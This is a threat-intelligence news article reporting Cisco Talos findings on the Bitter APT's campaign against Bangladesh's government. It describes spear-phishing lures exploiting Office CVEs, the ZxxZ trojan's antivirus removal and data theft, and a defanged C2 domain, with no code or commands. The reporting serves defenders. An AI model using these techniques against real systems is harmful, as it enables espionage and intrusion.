Bitter, an APT organization engaged in cyber espionage, has been seen targeting the government of Bangladesh with new malware that features remote file execution capabilities. The campaign has been running since at least August 2021 and is a good illustration of Bitter’s targeting scope, which has remained consistent since 2013.
Cisco Talos threat analysts discovered the campaign and provided details. Based on C2 IP address overlaps with previous campaigns, string encryption similarities, and the module naming methodology, Cisco Talos analysts ascribe this campaign to Bitter. During this campaign, Cisco noticed two infection chains, both of which started with a spear-phishing email and targeted distinct groups inside the Bangladeshi government.
These mails are issued through fake email addresses that appear to be from Pakistan government institutions. This was most likely accomplished by exploiting a weakness in the Zimbra mail server that allowed attackers to send messages from an email account/domain that did not exist. The distinction between the two infection chains is the kind of file attached to the infected email: one contains a .RTF document, while the other has a .XLSX document. These emails discuss call records and number verification in the context of actual government undertakings.
The RTF documents are used to attack CVE-2017-11882 and execute remote code on devices running vulnerable versions of Microsoft Office. “When the victim opens the RTF file with Microsoft Word, it invokes the Equation Editor application and executes the equation formula containing the Return-Oriented Programming (ROP) gadgets,” said Cisco Talos. “The ROP loads and executes the shellcode located at the end of the maldocs in an encrypted format that connects to the malicious host olmajhnservice[.]com and downloads the payload,” the researchers clarify.
Opening the Excel spreadsheet initiates an attack for CVE-2018-0798 and CVE-2018-0802, allowing remote code execution on older Microsoft Office versions. In this example, obtaining the payload is handled by two exploit-created scheduled tasks that connect to the hosting server and download the trojan every five minutes after the first infection.
The malware was dubbed ZxxZ by Cisco Talos. It’s a 32-bit Windows program that downloads and runs modules with generic names like “Update.exe,” “ntfsc.exe,” and “nx.exe.” According to the report, these files “are either downloaded or dropped into the victim’s local application data folder and run as a Windows Security update with medium integrity to elevate the privileges of a standard user.” Anti-detection measures include obfuscated strings, and the malware looks for the presence of Windows Defender and Kaspersky antivirus programs to eliminate them.
An information-stealing function is then enabled, which dumps victim profile data into a memory buffer and sends it to the command-and-control server (C2). The C2 then responds by storing a portable executable in “%LOCALAPPDATA%\Debug\.” If the ZxxZ malware fails to fetch that executable, it tries 225 more times before giving up and exiting. Bitter is still active, adding new tools to their arsenal and putting more effort into avoiding discovery. Defenders in South and Southeast Asia should employ Cisco Talos’ indications of compromise to detect and halt Bitter APT attacks.